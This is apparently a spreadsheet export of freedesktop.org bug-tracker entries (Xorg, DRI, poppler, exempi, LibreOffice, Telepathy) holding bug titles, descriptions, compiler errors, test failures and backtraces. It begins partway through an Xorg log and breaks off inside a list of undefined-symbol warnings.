[  2385.504] (**) AT Translated Set 2 keyboard: Device: /dev/input/event4
[  2385.504] (II) AT Translated Set 2 keyboard: Found keys
[  2385.504] (II) AT Translated Set 2 keyboard: Configuring as keyboard
[  2385.504] (II) XINPUT: Adding extended input device AT Translated Set 2 keyboard (type: KEYBOARD)
[  2385.505] (**) Option xkb_rules evdev
[  2385.505] (**) Option xkb_model pc105
[  2385.505] (**) Option xkb_layout de
[  2385.506] (II) config/udev: Adding input device SynPS/2 Synaptics TouchPad (/dev/input/event8)
[  2385.507] (**) SynPS/2 Synaptics TouchPad: Applying InputClass evdev touchpad catchall
[  2385.507] (**) SynPS/2 Synaptics TouchPad: Applying InputClass touchpad catchall
[  2385.507] (II) LoadModule: synaptics
[  2385.507] (II) Loading /usr/lib/xorg/modules/input/synaptics_drv.so
[  2385.508] (II) Module synaptics: vendor</t>
  </si>
  <si>
    <t>dontmind</t>
  </si>
  <si>
    <t>POPPLER-88172</t>
  </si>
  <si>
    <t>Error: Page count in top-level pages object is wrong type (null)</t>
  </si>
  <si>
    <t>I have two pdfs that spit out the error message below when using poppler utils. pdftk also couldn't open them. Mac Preview can open and display them.
pdftoppm E1_Galerieebene_20130717.pdf 
Syntax Error: Page count in top-level pages object is wrong type (null)
Wrong page range given: the first page (1) can not be after the last page (0).
pdftoppm U2_Tiefgaragenebene_20130717_\(1\).pdf 
Syntax Error: Page count in top-level pages object is wrong type (null)
Wrong page range given: the first page (1) can not be after the last page (0).
I can send a drop box link to these pdfs.
Is this a poppler fix or is there something wrong with the pdf?</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-107631</t>
  </si>
  <si>
    <t>Need to add new ssh key to my drm-firmware account</t>
  </si>
  <si>
    <t>Created attachment 141205
my ssh public key
I changed my system because of which I now cannot push my changes or do a git clone with ssh:// in it for drm-firmware repo.
I have generated new pair of ssh keys. Attaching my .pub key to this bug. Hope that helps resolve the issue.</t>
  </si>
  <si>
    <t>XORG-8909</t>
  </si>
  <si>
    <t>error: applewmstr.h: No such file or directory</t>
  </si>
  <si>
    <t>While compiling the X server in  xserver/hw/darwin/quartz/applewm.c these error are reported:
In file included from applewm.c:44:
./../darwin.h:50: warning: function declaration isnâ€™t a prototype
applewm.c:46:24: error: applewmstr.h: No such file or directory
applewm.c:83: error: parse error before â€˜*â€™ token
applewm.c:83: warning: function declaration isnâ€™t a prototype
applewm.c: In function â€˜AppleWMExtensionInitâ€™:
applewm.c:115: error: â€˜APPLEWMNAMEâ€™ undeclared (first use in this function)
applewm.c:115: error: (Each undeclared identifier is reported only once
applewm.c:115: error: for each function it appears in.)
applewm.c:116: error: â€˜AppleWMNumberEventsâ€™ undeclared (first use in this function)
applewm.c:117: error: â€˜AppleWMNumberErrorsâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMQueryVersionâ€™:
applewm.c:184: error: â€˜xAppleWMQueryVersionReplyâ€™ undeclared (first use in this function)
applewm.c:184: error: parse error before â€˜repâ€™
applewm.c:187: error: â€˜xAppleWMQueryVersionReqâ€™ undeclared (first use in this function)
applewm.c:188: error: â€˜repâ€™ undeclared (first use in this function)
applewm.c:191: error: â€˜APPLE_WM_MAJOR_VERSIONâ€™ undeclared (first use in this function)
applewm.c:192: error: â€˜APPLE_WM_MINOR_VERSIONâ€™ undeclared (first use in this function)
applewm.c:193: error: â€˜APPLE_WM_PATCH_VERSIONâ€™ undeclared (first use in this function)
applewm.c: At top level:
applewm.c:263: warning: function declaration isnâ€™t a prototype
applewm.c: In function â€˜ProcAppleWMSelectInputâ€™:
applewm.c:265: error: nested functions are disabled use -fnested-functions to re-enable
applewm.c:265: error: syntax error before â€˜*â€™ token
applewm.c:269: error: â€˜xAppleWMSelectInputReqâ€™ undeclared (first use in this function)
applewm.c:272: error: â€˜stuffâ€™ undeclared (first use in this function)
applewm.c: In function â€˜AppleWMSendEventâ€™:
applewm.c:358: error: â€˜xAppleWMNotifyEventâ€™ undeclared (first use in this function)
applewm.c:358: error: parse error before â€˜seâ€™
applewm.c:370: error: â€˜seâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMDisableUpdateâ€™:
applewm.c:394: error: â€˜xAppleWMDisableUpdateReqâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMReenableUpdateâ€™:
applewm.c:406: error: â€˜xAppleWMReenableUpdateReqâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMSetWindowMenuâ€™:
applewm.c:424: error: nested functions are disabled use -fnested-functions to re-enable
applewm.c:424: error: syntax error before â€˜*â€™ token
applewm.c:426: error: â€˜xAppleWMSetWindowMenuReqâ€™ undeclared (first use in this function)
applewm.c:428: error: â€˜stuffâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMSetWindowMenuCheckâ€™:
applewm.c:460: error: nested functions are disabled use -fnested-functions to re-enable
applewm.c:460: error: syntax error before â€˜*â€™ token
applewm.c:462: error: â€˜xAppleWMSetWindowMenuCheckReqâ€™ undeclared (first use in this function)
applewm.c:464: error: â€˜stuffâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMSetFrontProcessâ€™:
applewm.c:475: error: â€˜xAppleWMSetFrontProcessReqâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMSetWindowLevelâ€™:
applewm.c:487: error: nested functions are disabled use -fnested-functions to re-enable
applewm.c:487: error: syntax error before â€˜*â€™ token
applewm.c:489: warning: function declaration isnâ€™t a prototype
applewm.c:489: warning: nested extern declaration of â€˜__errorâ€™
applewm.c:491: error: â€˜xAppleWMSetWindowLevelReqâ€™ undeclared (first use in this function)
applewm.c:493: error: â€˜stuffâ€™ undeclared (first use in this function)
applewm.c:499: error: â€˜AppleWMNumWindowLevelsâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMSetCanQuitâ€™:
applewm.c:516: error: nested functions are disabled use -fnested-functions to re-enable
applewm.c:516: error: syntax error before â€˜*â€™ token
applewm.c:518: error: â€˜xAppleWMSetCanQuitReqâ€™ undeclared (first use in this function)
applewm.c:520: error: â€˜stuffâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMFrameGetRectâ€™:
applewm.c:534: error: â€˜xAppleWMFrameGetRectReplyâ€™ undeclared (first use in this function)
applewm.c:534: error: parse error before â€˜repâ€™
applewm.c:536: error: nested functions are disabled use -fnested-functions to re-enable
applewm.c:536: error: syntax error before â€˜*â€™ token
applewm.c:538: error: â€˜xAppleWMFrameGetRectReqâ€™ undeclared (first use in this function)
applewm.c:539: error: â€˜repâ€™ undeclared (first use in this function)
applewm.c:543: error: â€˜stuffâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMFrameHitTestâ€™:
applewm.c:567: error: â€˜xAppleWMFrameHitTestReplyâ€™ undeclared (first use in this function)
applewm.c:567: error: parse error before â€˜repâ€™
applewm.c:570: error: nested functions are disabled use -fnested-functions to re-enable
applewm.c:570: error: syntax error before â€˜*â€™ token
applewm.c:572: error: â€˜xAppleWMFrameHitTestReqâ€™ undeclared (first use in this function)
applewm.c:573: error: â€˜repâ€™ undeclared (first use in this function)
applewm.c:577: error: â€˜stuffâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMFrameDrawâ€™:
applewm.c:600: error: nested functions are disabled use -fnested-functions to re-enable
applewm.c:600: error: syntax error before â€˜*â€™ token
applewm.c:603: error: â€˜xAppleWMFrameDrawReqâ€™ undeclared (first use in this function)
applewm.c:605: error: â€˜stuffâ€™ undeclared (first use in this function)
applewm.c: In function â€˜ProcAppleWMDispatchâ€™:
applewm.c:644: error: â€˜X_AppleWMQueryVersionâ€™ undeclared (first use in this function)
applewm.c:649: error: â€˜AppleWMClientNotLocalâ€™ undeclared (first use in this function)
applewm.c:653: error: â€˜X_AppleWMSelectInputâ€™ undeclared (first use in this function)
applewm.c:655: error: â€˜X_AppleWMDisableUpdateâ€™ undeclared (first use in this function)
applewm.c:657: error: â€˜X_AppleWMReenableUpdateâ€™ undeclared (first use in this function)
applewm.c:659: error: â€˜X_AppleWMSetWindowMenuâ€™ undeclared (first use in this function)
applewm.c:661: error: â€˜X_AppleWMSetWindowMenuCheckâ€™ undeclared (first use in this function)
applewm.c:663: error: â€˜X_AppleWMSetFrontProcessâ€™ undeclared (first use in this function)
applewm.c:665: error: â€˜X_AppleWMSetWindowLevelâ€™ undeclared (first use in this function)
applewm.c:667: error: â€˜X_AppleWMSetCanQuitâ€™ undeclared (first use in this function)
applewm.c:669: error: â€˜X_AppleWMFrameGetRectâ€™ undeclared (first use in this function)
applewm.c:671: error: â€˜X_AppleWMFrameHitTestâ€™ undeclared (first use in this function)
applewm.c:673: error: â€˜X_AppleWMFrameDrawâ€™ undeclared (first use in this function)
applewm.c: At top level:
applewm.c:682: error: parse error before â€˜xAppleWMNotifyEventâ€™
applewm.c:682: warning: type defaults to â€˜intâ€™ in declaration of â€˜fromâ€™
applewm.c:682: warning: type defaults to â€˜intâ€™ in declaration of â€˜toâ€™
applewm.c:682: warning: data definition has no type or storage class
applewm.c:683: error: parse error before â€˜{â€™ token
applewm.c:686: error: parse error before â€˜charâ€™
applewm.c:687: error: parse error before â€˜charâ€™
applewm.c:687: error: parse error before â€˜charâ€™
applewm.c:687: error: parse error before â€˜charâ€™
applewm.c:688: error: parse error before â€˜charâ€™
applewm.c:688: error: parse error before â€˜charâ€™
applewm.c:688: error: parse error before â€˜charâ€™
applewm.c: In function â€˜SProcAppleWMQueryVersionâ€™:
applewm.c:697: error: nested functions are disabled use -fnested-functions to re-enable
applewm.c:697: error: syntax error before â€˜*â€™ token
applewm.c:698: error: â€˜stuffâ€™ undeclared (first use in this function)
applewm.c: In function â€˜SProcAppleWMDispatchâ€™:
applewm.c:711: error: â€˜AppleWMClientNotLocalâ€™ undeclared (first use in this function)
applewm.c:716: error: â€˜X_AppleWMQueryVersionâ€™ undeclared (first use in this function)
This patch makes them go away:
27c2729
&lt; 
---
&gt; #ifdef HAVE_XORG_CONFIG_H
&gt; #include 
&gt; #endif
46c48
&lt; #include applewmstr.h
---
&gt; #include X11/extensions/applewmstr.h
Mac OS X 10.4.8
GCC 4.0.1
Release 7.1.99.2</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-16137</t>
  </si>
  <si>
    <t>Hi guys. I need to change my gpg and ssh keys. Could you please?</t>
  </si>
  <si>
    <t>vignatti</t>
  </si>
  <si>
    <t>XORG-69950</t>
  </si>
  <si>
    <t>[xkbcomp] the keyword 'default' is ignored</t>
  </si>
  <si>
    <t>After adding the keyword 'default' to the level4 map in symbols/nbsp and then specifying setxkbmap us+nbsp xkbcomp still just takes the first-defined map the simple-space thing only when doing setxkbmap us+nbsp(level4) do I get the level4 thing.
This is both with a four-year old xkbcomp (from Ubuntu 10.04 that doesn't even know -version yet) and with xkbcomp 1.2.4 from git.</t>
  </si>
  <si>
    <t>DRI-24979</t>
  </si>
  <si>
    <t>After a suspend cycle overlay is garbaged</t>
  </si>
  <si>
    <t>Using drm-intel-next and DRM_MODE_OVERLAY_LANDED in intel driver with all master versions of everything.
This is G965 system.
After doing a s2ram cycle the overlay YUV offsets will be wrong.
I will see a b/w picture with series of blue/red rectanges and occasional flashes of green like on broken TV.
It doesn't matter if overlay was or wasn't used before suspend.
Note that if overlay was used it has to be running while doing the suspend otherwise system will hang on resume this is separate bug.</t>
  </si>
  <si>
    <t>EXEMPI-20540</t>
  </si>
  <si>
    <t>exempi-2.1.0 doesn't pass its test suite (NetBSD)</t>
  </si>
  <si>
    <t>I'm trying exempi-2.1.0 on NetBSD-5.0RC2/amd64 with expat-2.0.1 and boost-1.38.0.
'cd exempti/test &amp;&amp; make check' reports:
PASS: testcore.sh
terminate called after throwing an instance of 'boost::system_error'
[1]   Abort trap (core dumped) TEST_DIR=. BOOST...
FAIL: testinit
terminate called after throwing an instance of 'boost::system_error'
[1]   Abort trap (core dumped) TEST_DIR=. BOOST...
FAIL: testexempicore
terminate called after throwing an instance of 'boost::system_error'
[1]   Abort trap (core dumped) TEST_DIR=. BOOST...
FAIL: testserialise
terminate called after throwing an instance of 'boost::system_error'
[1]   Abort trap (core dumped) TEST_DIR=. BOOST...
FAIL: testwritenewprop
terminate called after throwing an instance of 'boost::system_error'
[1]   Abort trap (core dumped) TEST_DIR=. BOOST...
FAIL: testtiffleak
terminate called after throwing an instance of 'boost::system_error'
[1]   Abort trap (core dumped) TEST_DIR=. BOOST...
FAIL: testxmpfiles
terminate called after throwing an instance of 'boost::system_error'
[1]   Abort trap (core dumped) TEST_DIR=. BOOST...
FAIL: testxmpfileswrite
terminate called after throwing an instance of 'boost::system_error'
[1]   Abort trap (core dumped) TEST_DIR=. BOOST...
FAIL: test3
terminate called after throwing an instance of 'boost::system_error'
[1]   Abort trap (core dumped) TEST_DIR=. BOOST...
FAIL: testfdo18635
====================
9 of 10 tests failed
====================
*** Error code 1
There are two different error cases:
Most backtraces look like this:
 gdb test3 test3.core
GNU gdb 6.5
Copyright (C) 2006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x86_64--netbsd...
Reading symbols from /usr/X11R7/lib/libexpat.so.1...done.
Loaded symbols for /usr/X11R7/lib/libexpat.so.1
Reading symbols from /usr/lib/libz.so.1...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /usr/lib/libstdc++.so.6...done.
Loaded symbols for /usr/lib/libstdc++.so.6
Reading symbols from /usr/lib/libm.so.0...done.
Loaded symbols for /usr/lib/libm.so.0
Reading symbols from /usr/lib/libgcc_s.so.1...done.
Loaded symbols for /usr/lib/libgcc_s.so.1
Reading symbols from /usr/lib/libc.so.12...done.
Loaded symbols for /usr/lib/libc.so.12
Reading symbols from /usr/libexec/ld.elf_so...done.
Loaded symbols for /usr/libexec/ld.elf_so
Core was generated by `test3'.
Program terminated with signal 6 Aborted.
#0  0x00007f7ffd1db99a in _lwp_kill () from /usr/lib/libc.so.12
(gdb) bt
#0  0x00007f7ffd1db99a in _lwp_kill () from /usr/lib/libc.so.12
#1  0x00007f7ffd1db272 in abort () from /usr/lib/libc.so.12
#2  0x00007f7ffd8c0b0d in __gnu_cxx::__verbose_terminate_handler ()
   from /usr/lib/libstdc++.so.6
#3  0x00007f7ffd8c4f13 in __cxxabiv1::__terminate ()
   from /usr/lib/libstdc++.so.6
#4  0x00007f7ffd8c5a1b in __cxa_call_terminate () from /usr/lib/libstdc++.so.6
#5  0x00007f7ffd8c5807 in __gxx_personality_v0 () from /usr/lib/libstdc++.so.6
#6  0x00007f7ffd403a68 in _Unwind_Backtrace () from /usr/lib/libgcc_s.so.1
#7  0x00007f7ffd403cdb in _Unwind_Resume () from /usr/lib/libgcc_s.so.1
#8  0x000000000040952a in ~signal_handler (this=0x7f7fffffd400)
    at /usr/pkg/include/boost/test/impl/execution_monitor.ipp:686
#9  0x000000000040a6d9 in boost::execution_monitor::catch_signals (
    this=0x7f7fffffd6c0 F=@0x7f7fffffd6e0)
    at /usr/pkg/include/boost/test/impl/execution_monitor.ipp:764
#10 0x000000000040a71c in boost::execution_monitor::execute (
    this=0x7f7fffffd6c0 F=@0x7f7fffffd6e0)
    at /usr/pkg/include/boost/test/impl/execution_monitor.ipp:1091
#11 0x000000000040aca0 in main (argc=1 argv=)
    at /usr/pkg/include/boost/test/minimal.hpp:115
(gdb)
The one exception:
gdb testxmpfiles
GNU gdb 6.5
Copyright (C) 2006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x86_64--netbsd...
(gdb) r
Starting program: /home/wiz/exempi-2.1.0/exempi/tests/testxmpfiles
assertion srcdir != __null failed: file utils.cpp line 52 function void p
repare_test(int char** const char*)
Program received signal SIGABRT Aborted.
0x00007f7ffd1db99a in _lwp_kill () from /usr/lib/libc.so.12
(gdb)</t>
  </si>
  <si>
    <t>LIBREOFFICE-31855</t>
  </si>
  <si>
    <t>Size of print dialog is not remembered</t>
  </si>
  <si>
    <t>I like the new print dialog because it can be resized to show a bigger document preview and to show all printers (I have 17 printers installed).
It would be nice if the changed size of the print dialog is saved for the next invocation.
In the standard size of the print dialog only 4 printers are displayed and often the printer for the current document is selected but isn't displayed so I have to scroll the printer list box or resize the dialog to show alle printers to check which printer is currently selected.</t>
  </si>
  <si>
    <t>D.Szoska</t>
  </si>
  <si>
    <t>TELEPATHY-17331</t>
  </si>
  <si>
    <t>Implement Contacts interface and update implementation of Aliasing</t>
  </si>
  <si>
    <t>Implement GetAliases and the new Contacts interface.
See Gabble or Salut for reference code.</t>
  </si>
  <si>
    <t>XORG-104278</t>
  </si>
  <si>
    <t>segfault (segmentation fault) on libinput when resuming from hibernation (s2disk)</t>
  </si>
  <si>
    <t>Created attachment 136190
Syslog showing libinput error messages when resuming from hibernate.
Hi 
I have a laptop with an up-to-date Debian and Gnome. I always hibernate it rather than shut it down. Since a few days the X server has crashed when resuming from hibernation arrives to the lock screen forcing X to drop my previous session and restart a new one.
What is strange to me is that it happens every other time I resume meaning the sequence will be like:
1. Start a new session and work
2. Hibernate
3. Resume with no problem and work
4. Hibernate
5. Try to resume but it crashes and falls back on the login screen.
The attached syslog shows what happens from the first error message until the moment where X restarts the new session. In between there are to groups of error messages mentioning libinput (I don't know if it is relevant here but my only input devices are my Asus laptop's integrated keyboard and touchpad).</t>
  </si>
  <si>
    <t>fredgib</t>
  </si>
  <si>
    <t>DRI-72901</t>
  </si>
  <si>
    <t>[SNB/IVB/HSW/BYT/BDW Regression]igt/gem_largeobject fails</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform: Sandybridge/Ivybridge/Haswell
Kernel:  (drm-intel-nightly)074fdf374fa296c16a7449b9d2d4ad6ff73c0c8d
Bug detailed description:
-------------------------
It fails on Sandybridge/Ivybridge/Haswell with ppgtt and nightly branch. It works well on -fixes and -queued kernel.
The latest good commit: 02905525c3310ba673676f8041d0ff6be4da0e24 
The latest bad commit: a7c1d426ef335ccfb6bd567a3f616fa232418fa2 
output:
IGT-Version: 1.5-g2a71bff (x86_64) (Linux: 3.13.0-rc4_drm-intel-nightly_074fdf_20131219+ x86_64)
obj size 134217728
Test assertion failure function test_large_object file gem_largeobject.c:67:
Last errno: 19 No such device
Failed assertion: ioctl(fd DRM_IOCTL_I915_GEM_PIN &amp;pin) == 0
Reproduce steps:
----------------------------
1. ./gem_largeobject</t>
  </si>
  <si>
    <t>POPPLER-28588</t>
  </si>
  <si>
    <t>Incorrect placement of hyperlink anchors in certain PDFs</t>
  </si>
  <si>
    <t>this report has been filed here:
https://bugs.edge.launchpad.net/ubuntu/+source/poppler/+bug/544743
Poppler (and therefore Evince) place the anchors of hyperlinks incorrectly with some PDFs. I've attached a sample PDF which displays the problem. The link is the work link in the second sentence but Evince misplaces the anchor to around the word [This]. The same problem occurs when attempting to get hyperlink locations with the Poppler library directly. Xpdf and Adobe Acrobat Reader both place the hyperlink correctly. 
I've only seen this problem in some PDFs created by LaTeX so I've also attached the LaTeX file I used to make the test case. The necessary components are:
1) Setting the PDF crop box with the bottom left corner not being (0 0).
2) Using landscape mode.
3) Compiling through DVI (that is latex &gt; dvips &gt; ps2pdf or latex &gt; dvipdf).
This specificity might suggest a bug in LaTeX but the fact that both Xpdf and Acrobat place the anchor correctly suggests to me that LaTeX is doing something unusual but legal.
The PDF file created directly with pdflatex also attached has the anchor correctly placed by Poppler. Perhaps some PDF wizard can compare the two to find out what's different. (I do note that the two files are cropped differently by Evince. I don't know if that's a clue or not.)
pdf:
http://launchpadlibrarian.net/41674730/testcase.pdf
latex:
http://launchpadlibrarian.net/41674769/testcase.tex
test case compiled with pdflatex:
http://launchpadlibrarian.net/41674835/testcase.pdflatex.pdf</t>
  </si>
  <si>
    <t>DRI-108059</t>
  </si>
  <si>
    <t>[icl rps][CI] [DRMTIP] igt@pm_rps@* - fail - Test assertion failure function waitboost - post_freqs[CUR] &lt; post_freqs[MAX]</t>
  </si>
  <si>
    <t>The test igt@pm_rps@reset hits the following assertion on our ICL system:
Starting subtest: reset
(pm_rps:1373) CRITICAL: Test assertion failure function waitboost file ../tests/pm_rps.c:608:
(pm_rps:1373) CRITICAL: Failed assertion: post_freqs[CUR] &lt; post_freqs[MAX]
(pm_rps:1373) CRITICAL: error: 600 &gt;= 600
Subtest reset failed.
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_117/fi-icl-u/igt@pm_rps@reset.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_117/fi-icl-u/igt@pm_rps@min-max-config-loaded.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_117/fi-icl-u/igt@pm_rps@waitboost.html</t>
  </si>
  <si>
    <t>TELEPATHY-77143</t>
  </si>
  <si>
    <t>[next] would be nice to look for POINTER properties replace with BOXED</t>
  </si>
  <si>
    <t>TpHandleChannelContext:dbus-context (etc.) should probably be OBJECT rather than POINTER now.
TpProtocol:avatar-requirements should be BOXED rather than POINTER?</t>
  </si>
  <si>
    <t>XORG-14256</t>
  </si>
  <si>
    <t>AlwaysCore/SendCoreEvents broken</t>
  </si>
  <si>
    <t>Somewhere between 7.0 and the current state the handling of the AlwaysCore SendCoreEvents CoreKeyboard and CorePointer config options in xorg.conf was broken. See xorg-server-1.4/hw/xfree86/common/xf86Xinput.c
 115 xf86ProcessCommonOptions(LocalDevicePtr local
 116                          pointer        list)
 117 {
 118     if (xf86SetBoolOption(list AlwaysCore 0) ||
 119         !xf86SetBoolOption(list SendCoreEvents 1) ||
 120         !xf86SetBoolOption(list CorePointer 1) ||
 121         !xf86SetBoolOption(list CoreKeyboard 1)) {
 122         xf86Msg(X_CONFIG %s: doesn't report core events\n local-&gt;name)
 123     } else {
 124         local-&gt;flags |= XI86_ALWAYS_CORE
 125         xf86Msg(X_CONFIG %s: always reports core events\n local-&gt;name)
 126     }
 127 
...
If one uses the AlwaysCore option in an Section InputDevice the comparison above evaluates to *true* and such XI86_ALWAYS_CORE is *not* set!
In 7.0 this option handling was correct.</t>
  </si>
  <si>
    <t>jjj</t>
  </si>
  <si>
    <t>XORG-93105</t>
  </si>
  <si>
    <t>Libglamoregl.so module fails to load because of undefined symbol: fbComposite</t>
  </si>
  <si>
    <t>Created attachment 120116
Log file of failed server startup with the new R270X card
Running ROSA 2014.1 R6 on x86_64 with a Radeon HD5750 video card.
For the above distribution I routinely build updated packages of libdrm pixman Mesa xserver and related libraries and drivers and test them on my pc.
Some days ago I bought a newer video cards (Radeon R270X) to upgrade my pc system and then the xserver started to hang on startup: in the log file attached below there is a couple of error messages about libglamoregl.so and libshadow.so failing to load because of undefined symbols error: fbComposite for the first one fbGetScreenPrivateKey for the latter.
Given that the R270X use the radeonsi driver and this in turn needs glamor to work I guess that the hang originates here...
With the old video card (r600 driver) when setting AccelMethod to glamor there is the same error but no hang because the driver automatically falls back to EXA.
The build log for the xserver I'm testing now (1.17.4) shows indeed many warnings about undefined symbols in libglamoregl.so libshadow.so and some more xserver modules:
*********************
Warning: undefined symbols in /usr/lib64/xorg/modules/libvgahw.so: xf86FindOption xf86GetPciInfoForEntity xf86GetFlipPixels xf86IsUnblank xf86MarkOptionUsedByName xf86AllocateScrnInfoPrivateIndex xf86ScreenToScrn XNFcalloc xf86DrvMsg xf86SlowBcopy xf86HandleColormaps xf86DrvMsgVerb
Warning: undefined symbols in /usr/lib64/xorg/modules/libfb.so: miPolyRectangle miFillPolygon miPolyFillArc miPolyText8 miPolyText16 miImageText8 miImageText16 miChangeGC miCopyGC miDestroyGC miChangeClip miDestroyClip miCopyClip miZeroLineScreenKeyRec miWideDash globalSerialNumber miCompositeRects miWideLine screenInfo NoopDDA RegionEmptyData miPolySegment PictureScreenPrivateKeyRec PixmapWidthPaddingInfo RegionEmptyBox RegionRectAlloc miDoCopy miPolyArc miComputeCompositeClip miCompositeSourceValidate miSetVisualTypesAndMasks miPictureInit ValidateGC ShmRegisterFbFuncs FreePixmap dixRegisterPrivateKey RegionCreate FakeClientID miListInstalledColormaps ChangeGC GetGlyphPicture miScreenInit miInstallColormap miInitVisuals AllocatePixmap dixRegisterScreenSpecificPrivateKey miHandleExposures miExpandDirectColors miCreateDefColormap miWindowExposures miResolveColor miSetVisualTypes miInitializeColormap miCreateScreenResources DamageRegionAppend miZeroArcSetup miZeroPolyArc miUninstallColormap miClearVisualTypes DamageRegionProcessPending miCopyRegion miModifyPixmapHeader miZeroClipLine
Warning: undefined symbols in /usr/lib64/xorg/modules/libexa.so: miPolyRectangle miFillPolygon miPolyFillArc miPolyText8 miPolyText16 miImageText8 miImageText16 globalSerialNumber serverClient RegionEmptyData PictureScreenPrivateKeyRec PixmapWidthPaddingInfo RegionEmptyBox miDoCopy RegionDestroy xf86ScrnToScreen ValidatePicture ValidateGC dixRegisterPrivateKey DamageSetReportAfterOp RegionFromRects DamageRegion RegionCreate GetScratchGC FreeScratchGC ShmRegisterFuncs CreatePicture GetGlyphPicture miTriangleBounds PictureMatchFormat dixRegisterScreenSpecificPrivateKey xf86ScreenToScrn AdjustWaitForDelay FatalError miGlyphs xf86DrvMsg GetTimeInMillis DamageDestroy XNFalloc xf86ReturnOptValBool DamagePendingRegion DamageDamageRegion DamageRegionAppend miComputeCompositeRegion LogMessage CompositePicture DamageRegionProcessPending DamageRegister FreePicture miCopyRegion xf86ProcessOptions xf86GetOptValString miTrapezoidBounds ErrorF DamageCreate
Warning: undefined symbols in /usr/lib64/xorg/modules/libvbe.so: xf86ValidateModes xf86PrintModes xf86int10Addr XNFasprintf xf86CVTMode xf86FindScreenForEntity xf86LoadSubModule xf86ErrorFVerb XNFcalloc xf86DrvMsg xf86ExtendedInitInt10 xf86GetOptValBool xf86ExecX86int10 XNFalloc xf86Int10FreePages xf86ModeStatusToString xf86CheckModeForMonitor xf86InterpretEDID xf86DrvMsgVerb xf86FreeInt10 xf86Int10AllocPages xf86ProcessOptions ErrorF
Warning: undefined symbols in /usr/lib64/xorg/modules/libint10.so: xf86GetEntityInfo xf86GetPciInfoForEntity xf86MsgVerb xf86IsEntityPrimary xf86GetVerbosity xf86FindScreenForEntity xf86ErrorFVerb XNFcalloc VErrorF xf86DrvMsg OsBlockSignals xf86GetOptValBool XNFalloc OsReleaseSignals xf86DrvMsgVerb xf86ProcessOptions
Warning: undefined symbols in /usr/lib64/xorg/modules/extensions/libglx.so: noGlxExtension xf86Info enableIndirectGLX currentMaxClients serverClient StandardMinorOpcode lastGLContext screenInfo clients ClientStateCallback NoopDDA serverGeneration DRI2HasSwapControl AddCallback DRI2GetBuffersWithFormat xf86ScrnToScreen xf86Msg ResetCurrentRequest ValidateGC LoaderSymbol dixLookupFontable FreeResource dixRegisterPrivateKey IgnoreClient dixLookupResourceByType LegalNewID DRI2SwapBuffers dixLookupWindow FakeClientID FindWindowWithOptional CreateNewResourceType DRI2WaitSwap DRI2Connect FreeGC AttendClient ResizeVisualArray AddResource xf86ScreenToScrn dixLookupDrawable CreateGC DRI2CopyRegion DRI2SwapInterval FatalError AddExtensionAlias FreeResourceByType LoadExtensionList AddExtension XNFalloc LogMessage LogMessageVerbSigSafe DRI2GetBuffers DRI2CreateDrawable2 present_register_complete_notify WriteEventsToClient WriteToClient ErrorF
Warning: undefined symbols in /usr/lib64/xorg/modules/libwfb.so: miPolyRectangle miFillPolygon miPolyFillArc miPolyText8 miPolyText16 miImageText8 miImageText16 miChangeGC miCopyGC miDestroyGC miChangeClip miDestroyClip miCopyClip miZeroLineScreenKeyRec miWideDash globalSerialNumber miCompositeRects miWideLine screenInfo NoopDDA RegionEmptyData miPolySegment PictureScreenPrivateKeyRec PixmapWidthPaddingInfo RegionEmptyBox RegionRectAlloc miDoCopy miPolyArc miComputeCompositeClip miCompositeSourceValidate miSetVisualTypesAndMasks miPictureInit ValidateGC ShmRegisterFbFuncs FreePixmap dixRegisterPrivateKey RegionCreate FakeClientID miListInstalledColormaps ChangeGC GetGlyphPicture miScreenInit miInstallColormap miInitVisuals AllocatePixmap dixRegisterScreenSpecificPrivateKey miHandleExposures miExpandDirectColors miCreateDefColormap miWindowExposures miResolveColor miSetVisualTypes miInitializeColormap miCreateScreenResources DamageRegionAppend miZeroArcSetup miZeroPolyArc miUninstallColormap miClearVisualTypes DamageRegionProcessPending miCopyRegion miModifyPixmapHeader miZeroClipLine
Warning: undefined symbols in /usr/lib64/xorg/modules/libfbdevhw.so: xf86IsUnblank xf86AllocateScrnInfoPrivateIndex xf86ScreenToScrn XNFcalloc xf86DuplicateMode xf86DrvMsg XNFalloc xf86DrvMsgVerb
Warning: undefined symbols in /usr/lib64/xorg/modules/libshadowfb.so: dixRegisterPrivateKey DamageSetReportAfterOp xf86ScreenToScrn DamageRegister ErrorF DamageCreate
Warning: undefined symbols in /usr/lib64/xorg/modules/drivers/modesetting_drv.so: xf86CrtcConfigPrivateIndex xf86SaveScreen xf86DPMSSet NoopDDA serverGeneration shadowRemove xf86SetDefaultVisual xf86GetDefaultModes xf86GetEntityInfo xf86GetDevFromEntity xf86IsEntityShared xf86ClaimFbSlot xf86ModesAdd RegisterBlockAndWakeupHandlers xf86SetSingleMode xf86ModeWidth xf86ScrnToScreen RRChangeOutputProperty glamor_set_screen_pixmap xf86RemoveGeneralHandler xf86SetDpi present_screen_init glamor_egl_create_textured_pixmap_from_gbm_bo DRI2SwapComplete xf86SetBlackWhitePixels drmModeSetCrtc xf86PruneInvalidModes drmModeGetResources ValidateGC xf86XVScreenInit drmModeGetConnector drmModeRmFB drmModeFreeEncoder drmDropMaster xf86SetGamma xf86GetPciInfoForEntity dixRegisterPrivateKey RRCrtcGammaSet dixLookupResourceByType xf86MatchDevice glamor_egl_get_gbm_device DamageRegion xf86OutputFindClosestMode shadowSetup RegionCreate drmSetInterfaceVersion xf86PrintDepthBpp xf86CrtcCreate drmGetBusid drmWaitVBlank fbScreenInit glamor_xv_init GetScratchGC FreeScratchGC glamor_egl_destroy_textured_pixmap 